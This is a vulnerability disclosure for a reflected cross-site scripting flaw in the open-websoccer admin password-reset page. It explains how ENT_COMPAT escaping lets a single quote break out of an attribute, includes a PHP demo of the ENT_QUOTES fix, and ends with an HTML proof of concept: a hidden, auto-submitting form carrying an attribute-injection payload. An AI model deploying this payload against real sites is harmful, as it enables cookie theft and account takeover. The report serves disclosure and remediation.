
@LioTree
Created May 3, 2024 08:47
open-websoccer xss

vendor: ihofmann/open-websoccer: A PHP based online football/soccer manager game. (github.com)

version: <= 5.2.3

php version: 5.x

An XSS (Cross-Site Scripting, CWE-79) vulnerability exists in websoccer/admin/forgot-password.php. At line 129, $_POST['inputEmail'] is inserted into the value attribute of an <input> tag after being passed through escapeOutput, which calls htmlspecialchars($message, ENT_COMPAT, 'UTF-8') at line 30 of websoccer/admin/functions.inc.php. However, htmlspecialchars does not escape ' unless the ENT_QUOTES flag is given. Because the value attribute is delimited by single quotes, an attacker can use ' to break out of the attribute and inject further attributes containing malicious JavaScript. This allows attackers to obtain the cookies of the administrator and other users and to log in as them using the obtained cookies.

```php
// websoccer/admin/forgot-password.php (excerpt): the POST value reaches a single-quoted attribute
$inputEmail = (isset($_POST['inputEmail'])) ? trim($_POST['inputEmail']) : FALSE;
......
<input type='email' name='inputEmail' id='inputEmail' placeholder='E-Mail' value='<?php echo escapeOutput($inputEmail); ?>'>
```

```php
// websoccer/admin/functions.inc.php (excerpt): ENT_COMPAT leaves the single quote unencoded
/**
 * Escapes for HTML output. Uses <code>htmlspecialchars</code> (UTF-8).
 * 
 * @param string $message message string to escape.
 * @return string escaped input string, ready for secure HTML output.
 */
function escapeOutput($message) {
	return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}
```
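To make the ENT_COMPAT/ENT_QUOTES difference concrete, the following PHP script (an added example, not code from the gist or from the open-websoccer project) renders the same single-quoted value attribute twice: once through a copy of the original escaper and once through a replacement that passes ENT_QUOTES. The function names, the attribute template and the safety check are assumptions made for this example; the input string is the attribute-breakout value already shown in the report.

```php
<?php
// Added example, not from the gist or the open-websoccer code base. It places
// the report's attribute-breakout string into the same single-quoted value
// attribute once with the original ENT_COMPAT escaper and once with an
// ENT_QUOTES replacement. Function names and the template are assumptions.

// Mirrors the original helper: ENT_COMPAT encodes " but leaves ' untouched.
function escapeOutputCompat($message) {
    return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}

// Hardened variant: ENT_QUOTES encodes both " and ', so the value cannot
// terminate a single- or double-quoted attribute. ENT_SUBSTITUTE replaces
// invalid UTF-8 with U+FFFD instead of returning an empty string, which
// would otherwise silently drop the whole value.
function escapeOutputQuotes($message) {
    return htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Builds the <input> tag in the shape the report describes, using one escaper.
function renderEmailInput($value, callable $escaper) {
    return "<input type='email' name='inputEmail' value='" . $escaper($value) . "'>";
}

// Defensive check for templates: an escaped value that still contains a raw
// quote of either kind can close a quoted attribute and is not safe to embed.
function isAttributeSafe($escaped) {
    return strpos($escaped, "'") === false && strpos($escaped, '"') === false;
}

// Constructed input: the attribute-breakout string from the report.
$input = "' onfocus=alert(1) autofocus '";

$escapers = array(
    'ENT_COMPAT' => 'escapeOutputCompat',
    'ENT_QUOTES' => 'escapeOutputQuotes',
);

foreach ($escapers as $label => $fn) {
    $escaped = $fn($input);
    printf("%-10s attribute-safe=%-3s %s\n",
        $label,
        isAttributeSafe($escaped) ? 'yes' : 'no',
        renderEmailInput($input, $fn));
}
```

Run it with `php example.php`. The ENT_COMPAT line keeps both single quotes in the rendered tag, so the browser sees the value attribute close early and parses `onfocus` and `autofocus` as attributes of the input; the ENT_QUOTES line encodes each ' as `&#039;` (or `&apos;` if ENT_HTML5 is also passed), so the whole string stays inside the attribute value. Since ENT_QUOTES also covers double-quoted attributes, it is the safer default for any output helper that templates use inside attributes, independent of which quote style a given template happens to use.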

The PoC is as follows:

Create a malicious webpage designed to inject JavaScript code into the target page (http://xxxx/admin/forgot-password.php):

```html
<html>
<head>
    <script>
        window.onload = function() {
            document.getElementById("postsubmit").click();
        }
    </script>
</head>

<body>
    <form method="post" action="http://localhost/open-websoccer/websoccer/admin/forgot-password.php">
        <input id="xssr_in" type="text" style="display:none" name="inputEmail" value="' onfocus=alert(1) autofocus '" />
        <div style="display:none;"><input id="postsubmit" type="submit" name="submit" value="submit" /></div>
    </form>
</body>
</html>
```

When the victim visits this malicious page, the JavaScript code is executed in the context of the target page.
